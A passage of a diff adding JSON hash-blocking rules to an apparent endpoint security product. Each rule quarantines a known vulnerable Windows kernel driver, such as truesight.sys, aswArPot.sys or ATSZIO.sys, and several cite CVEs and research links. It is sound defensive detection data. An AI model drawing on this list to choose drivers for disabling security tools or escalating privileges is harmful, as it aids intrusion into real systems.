"value": "fafa1bb36f0ac34b762a10e9f327dcab2152a6d0b16a19697362d49a31e7f566", + "comment": "Vulnerable Kernel Driver (aka netfilter2.sys) [https://www.loldrivers.io/drivers/5ad8a3b6-6d20-4c95-8fa7-9a507167ba3c/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "32841b1a-8ca9-5e06-904b-24623b286c5c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.143260Z", + 
"creation_date": "2026-03-23T11:45:32.143262Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:32.143268Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d1f4949f76d8ac9f2fa844d16b1b45fb1375d149d46e414e4a4c9424dc66c91f", + "comment": "Vulnerable Kernel Driver (aka iQVW64.SYS) [https://www.loldrivers.io/drivers/4dd3289c-522c-4fce-b48e-5370efc90fa1/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "328764df-64e0-5924-8b11-b07fd84a4bb3", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.610724Z", + "creation_date": "2026-03-23T11:45:29.610726Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.610731Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "aebcbfca180e372a048b682a4859fd520c98b5b63f6e3a627c626cb35adc0399", + "comment": "CPUID CPU-Z vulnerable driver (aka cpuz143_x64.sys) [CVE-2017-15302] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "3292cc44-dd4e-507b-85e9-70227d33d597", + "test_maturity_current_count": 
0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.820752Z", + "creation_date": "2026-03-23T11:45:31.820755Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.820763Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1c5426d89f7b6c799c34932e4a611e68ecf84f1d227fc64214e53bd94afc55d3", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "32aab162-ba62-57e7-90ef-1e32670fd2c9", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.833092Z", + "creation_date": "2026-03-23T11:45:30.833096Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.833105Z", + "rule_level": 
null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b133de6cbfcf087f25760800516ffe28457b18925ebc7d162f7c6926fcce4741", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "32ab2447-809c-5718-b0cc-7cf94ea5d9ab", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.614787Z", + "creation_date": "2026-03-23T11:45:29.614789Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.614795Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "9c10e2ec4f9ef591415f9a784b93dc9c9cdafa7c69602c0dc860c5b62222e449", + "comment": "MICRO-STAR vulnerable drivers (aka NBIOLib_X64.sys, NTIOLib_X64.sys, NTIOLib.sys and NBIOLib.sys) [CVE-2021-44899] [http://blog.rewolf.pl/blog/?p=1630] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "32bcc1dc-18ea-590e-bbed-e62f28d8ae3b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + 
"rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.812046Z", + "creation_date": "2026-03-23T11:45:31.812048Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.812053Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "461cd721500c149bc6a1051437b75a7848c2cc63f010cb1d9fd6b432afd11b04", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "32c03f51-a1d8-504a-8713-4313c30de4fe", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.824376Z", + "creation_date": "2026-03-23T11:45:31.824379Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.824388Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 
"c5104b29da9711075558e2197a4e82923dd5dba8ac9e5973954c1ee7215cd427", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "32cac183-96fa-513e-97ca-ba91113eda50", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.820599Z", + "creation_date": "2026-03-23T11:45:30.820601Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.820607Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ed3448152bcacf20d7c33e9194c89d5304dee3fba16034dd0cc03a3374e63c91", + "comment": "Vulnerable Kernel Driver (aka ComputerZ.Sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "32d12ab1-5290-5245-bc54-bc2d9e96abba", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": 
"system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.820135Z", + "creation_date": "2026-03-23T11:45:31.820139Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.820147Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "8f3674ad46425d496e246cb95a21df0198bdfa3c259aef6f35dd8f215fb295cb", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "32e366ce-b86d-585d-91f8-16f0206994dc", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.474245Z", + "creation_date": "2026-03-23T11:45:30.474248Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.474257Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "2815c91fe5053899593cec83218b8dff85cfd85cea667dbbf2153cbc3cde000f", + "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] 
[authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "32e51e7c-1eb2-51fd-87aa-02d3c07ae84c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.809210Z", + "creation_date": "2026-03-23T11:45:31.809213Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.809221Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "43e851763ab1b28fa121216cd7ed92525ed9ca3f69abba8b753ba8500620d2e5", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "32e602b9-0718-55d7-8f9d-87c2452e0aae", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.153506Z", + "creation_date": "2026-03-23T11:45:31.153508Z", + "enabled": true, + "block_on_agent": true, + 
"quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.153514Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1ca5aa8d7bb7d926961f1af8ae909780e8e10e16c2f8f118e0c78c635b28cfc0", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "32e8da6d-fe91-5cfa-b846-b18c0a08a01d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.809881Z", + "creation_date": "2026-03-23T11:45:31.809884Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.809890Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c435b76b1753a9d778a5030e910519c1617d77fad5811a76936e15b21d69c3f5", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "3312c1a0-08aa-57e0-aefb-5a8f62302e79", + 
"test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.151072Z", + "creation_date": "2026-03-23T11:45:31.151075Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.151080Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "15d2b157135b3ee811ab5bde67947a29d67e0ebc1646c3dd760bbc2d4996e634", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "331711ad-039d-52e3-8c32-03c38328ef7b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.612283Z", + "creation_date": "2026-03-23T11:45:29.612285Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": 
"2026-03-23T11:45:29.612290Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "01e024cb14b34b6d525c642a710bfa14497ea20fd287c39ba404b10a8b143ece", + "comment": "ASUS WinFlash vulnerable driver (aka ATSZIO.sys and ATSZIO64.sys) [https://github.com/Chigusa0w0/AsusDriversPrivEscala/blob/master/ATSZIO.md] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "3321e356-33e7-5603-8353-2c12bf63cd68", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.498973Z", + "creation_date": "2026-03-23T11:45:31.498976Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.498985Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0f4084cce01f18932a01239b1501b6707ca60642293e54b50c59b050f28da6d3", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "332dccb2-8bc4-52b8-b97c-659a72ab043e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + 
"rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.983175Z", + "creation_date": "2026-03-23T11:45:29.983177Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.983183Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "5874e47ef681bc7cd86df905751fd0f692eed11b6a30fa68df592806316f9bc2", + "comment": "Vulnerable Kernel Driver (aka b3.sys) [https://www.loldrivers.io/drivers/adfb015a-f453-4b9e-a247-50f146209eb0/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "33352fc7-d4ee-5b3e-888e-c30627d5cf97", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.834726Z", + "creation_date": "2026-03-23T11:45:30.834729Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.834739Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 
"cde0a6cb79c9e87e1d5cd0b2da48df3e8ac007dde81589417ae52017db7f4dd9", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "3347bb5e-80e3-5f9d-b324-d4ad07cfe595", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.458579Z", + "creation_date": "2026-03-23T11:45:30.458582Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.458591Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "5271f526b19331c7f8526a5e10b9aedc0ddd325958aa0e908ceaee40692f7ae2", + "comment": "Vulnerable Kernel Driver (aka nscm.sys) [https://www.loldrivers.io/drivers/351ff5ca-f07b-4eb6-9300-d5d31514defb/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "336253a1-b634-57f8-b922-8e35db358ad4", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": 
"system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.457902Z", + "creation_date": "2026-03-23T11:45:30.457905Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.457913Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "14938f68957ede6e2b742a550042119a8fbc9f14427fb89fa53fff12d243561c", + "comment": "Vulnerable Kernel Driver (aka nscm.sys) [https://www.loldrivers.io/drivers/351ff5ca-f07b-4eb6-9300-d5d31514defb/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "33690441-6e78-5490-a5c7-347f31939b4d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.979846Z", + "creation_date": "2026-03-23T11:45:29.979848Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.979854Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "258359a7fa3d975620c9810dab3a6493972876a024135feaf3ac8482179b2e79", + "comment": "Vulnerable Kernel Driver (aka t8.sys) [https://www.loldrivers.io/drivers/8c2fa9d1-b2b1-4ba1-bad9-60c44c2c20eb/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ 
+ "id": "336f8934-75d6-53fa-b230-6f9b52fb4f2a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.823034Z", + "creation_date": "2026-03-23T11:45:30.823036Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.823041Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "8001d7161d662a6f4afb4d17823144e042fd24696d8904380d48065209f28258", + "comment": "Vulnerable Kernel Driver (aka FH-EtherCAT_DIO.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "33774780-26d8-53e8-90f8-8cb91c900ea0", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.969435Z", + "creation_date": "2026-03-23T11:45:29.969437Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": 
"2026-03-23T11:45:29.969443Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e5183eda50e2c42d2ed10c015be87dff774da180928c076e99888b0d6a931df5", + "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] [https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "337bb937-0924-5eee-816d-162f323cd0ea", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.816116Z", + "creation_date": "2026-03-23T11:45:31.816119Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.816127Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a70f2302cea9903b3f90ff5c89c3b91efea09798bd8205650d3023def1a88ae6", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "337cc11d-bd5b-55e8-9860-70e4837a051e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + 
